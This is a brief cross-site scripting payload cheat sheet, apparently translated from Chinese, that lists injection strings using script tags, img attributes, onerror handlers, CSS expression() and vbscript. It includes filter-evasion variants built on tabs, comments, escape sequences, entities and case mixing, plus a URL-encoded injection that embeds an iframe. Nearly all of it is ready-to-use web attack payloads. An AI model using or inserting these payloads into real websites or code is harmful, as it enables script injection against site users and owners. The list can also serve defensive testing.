<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ? characters stand for whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["